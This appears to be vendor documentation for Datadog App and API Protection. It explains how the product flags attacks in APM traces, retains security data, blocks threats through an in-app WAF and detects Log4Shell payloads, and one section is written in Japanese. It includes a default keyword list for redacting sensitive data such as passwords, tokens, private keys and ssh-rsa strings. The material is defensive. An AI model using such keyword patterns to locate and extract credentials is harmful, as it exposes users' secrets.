Overview

Datadog App and API Protection provides observability into application-level attacks that aim to exploit code-level vulnerabilities or abuse the business logic of your application, and into any bad actors targeting your systems. It provides:

• Observability into attacks: Provides insight into application-level attacks targeting code vulnerabilities or business logic.
• Trace-based monitoring: Utilizes the same tracing libraries as Datadog APM to monitor traffic and detect security threats.
• Security signals: Automatically generates security signals when attacks or business logic abuses are detected, focusing on meaningful threats rather than individual attempts.
• Notification Options: Offers notifications through Slack, email, or PagerDuty based on security signal settings.
• Embedded security: Integrated within the application, providing better threat identification and classification by accessing trace data.
• Enhanced WAF functionality: Functions like a Web Application Firewall (WAF) but with additional application context, improving accuracy and reducing false positives.

Identify services exposed to application attacks

Datadog App and API Protection Threat Management uses the information APM is already collecting to flag traces containing attack attempts. While APM collects a sample of your application traffic, enabling App and API Protection in the tracing library is necessary to effectively monitor and protect your services.

Services exposed to application attacks are highlighted directly in the security views embedded in APM (Software Catalog, Service Page, Traces).

Datadog Threat Monitoring and Detection identifies bad actors by collecting client IP addresses, login account info (for example, user account/ID), and manually-added user tags on all requests.

Compatibility

For Datadog App and API Protection to be compatible with your Datadog configuration, you must have APM enabled and sending traces to Datadog. App and API Protection uses the same libraries used by APM, so you don’t need to deploy and maintain another library.

Steps to enable Datadog App and API Protectionon are specific to each runtime language. Check to see if your language is supported in the App and API Protection prerequisites for each product.

Serverless monitoring

Datadog App and API Protection for AWS Lambda provides deep visibility into attackers targeting your functions. With distributed tracing providing a context-rich picture of the attack, you can assess the impact and remediate the threat effectively.

Read Enabling App and API Protection for Serverless for information on setting it up.

Performance

Datadog App and API Protection uses processes already contained in the Agent and APM, so there are negligible performance implications when using it.

When APM is enabled, the Datadog library generates distributed traces. Datadog App and API Protection flags security activity in traces by using known attack patterns. Correlation between the attack patterns and the execution context provided by the distributed trace triggers security signals based on detection rules.

Data sampling and retention

In the tracing library, Datadog App and API Protection collects all traces that include security data. A default retention filter ensures the retention of all security-related traces in the Datadog platform.

Data for security traces is kept for 90 days. The underlying trace data is kept for 15 days.

Data privacy

By default, App and API Protection collects information from security traces to help you understand why the request was flagged as suspicious. Before sending the data, App and API Protection scans it for patterns and keywords that indicate that the data is sensitive. If the data is deemed sensitive, it is replaced with a <redacted> flag. This indicates that the request was suspicious, but that the request data could not be collected because of data security concerns.

Here are some examples of data that is flagged as sensitive by default:

• pwd, password, ipassword, pass_phrase
• secret
• key, api_key, private_key, public_key
• token
• consumer_id, consumer_key, consumer_secret
• sign, signed, signature
• bearer
• authorization
• BEGIN PRIVATE KEY
• ssh-rsa

To configure the information redacted by App and API Protection, refer to the data security configuration

Threat detection methods

Datadog uses multiple pattern sources, including the OWASP ModSecurity Core Rule Set to detect known threats and vulnerabilities in HTTP requests. When an HTTP request matches one of the OOTB detection rules, a security signal is generated in Datadog.

Automatic Threat Patterns Updates: If your service is running with an Agent with Remote Configuration enabled and a tracing library version that supports it , the threat patterns being used to monitor your service are automatically updated whenever Datadog publishes updates.

Security Signals are automatically created when Datadog detects meaningful attacks targeting your production services. It provides you with visibility on the attackers and the targeted services. You can set custom detection rules with thresholds to determine which attacks you want to be notified about.

Built-in protection

リモート構成を有効にした Agent とそれをサポートするトレーシングライブラリのバージョンを実行しているサービスでは、Agent やトレーシングライブラリの追加構成なしに、Datadog UI から攻撃や攻撃者をブロックできます。

ASM Protect は、Threat Detection の枠を超え、攻撃や攻撃者の動きを鈍らせるブロッキングアクションを可能にします。境界型 WAF が広範囲のルールを適用してトラフィックを検査するのとは異なり、ASM は、アプリケーションの完全なコンテキスト――そのデータベース、フレームワーク、プログラミング言語――を用いて、最も効率的な検査ルールセットを絞り込んで適用します。

ASM は、アプリケーションを以下のような脅威から保護するために、Application Performance Monitoring (APM) と同じトレーシングライブラリを利用しています。

• 攻撃: ASM のアプリ内 WAF は、すべての受信トラフィックを検査し、パターンマッチングを使用して悪意のあるトラフィック (セキュリティトレース) を検出してブロックします。
• 攻撃者: アプリケーションに対して攻撃を仕掛けている IP アドレスと認証済みユーザーは、ライブラリによって収集されたインサイトから検出され、セキュリティシグナルでフラグが立てられます。

セキュリティトレースは、 Datadog トレーシングライブラリによってリアルタイムにブロックされます。ブロックは Datadog に保存され、Datadog Agent によって自動的かつ安全にフェッチされ、インフラストラクチャーにデプロイされ、サービスに適用されます。詳細は、リモート構成の仕組みを参照してください。

アプリ内 WAF、IP ブロック、ユーザーブロックなど、Protection 機能の活用を開始するには、Protection をお読みください。

Attack attempt qualification

Leveraging distributed tracing information, attacks attempts are qualified as safe, unknown, or harmful.

• Attack attempts qualified as safe cannot breach your application, for example, when a PHP injection attack targets a service written in Java.
• An unknown qualification is decided when there is not enough information to make a definitive judgement about the attack’s probability of success.
• A harmful qualification is highlighted when there is evidence that a code level vulnerability has been found by the attacker.

Threat monitoring coverage

Datadog App and API Protection includes over 100 attack signatures that help protect against many different kinds of attacks, including, but not limited to, the following categories:

• SQL injections
• Code injections
• Shell injections
• NoSQL injections
• Cross-Site Scripting (XSS)
• Server-side Request Forgery (SSRF)

API security

Datadog App and API Protection provides visibility into threats targeting your APIs. Use the Endpoints list in Software Catalog to monitor API health and performance metrics, where you can view attacks targeting your APIs. This view includes the attacker’s IP and authentication information, as well as request headers showing details about how the attack was formed. Using both App and API Protection and API management, you can maintain a comprehensive view of your API attack surface, and respond to mitigate threats.

How Datadog App and API Protection protects against Log4Shell

Datadog App and API Protection identifies Log4j Log4Shell attack payloads and provides visibility into vulnerable apps that attempt to remotely load malicious code. When used in tandem with the rest of Datadog’s Cloud SIEM, you can investigate to identify common post-exploitation activity, and proactively remediate potentially vulnerable Java web services acting as an attack vector.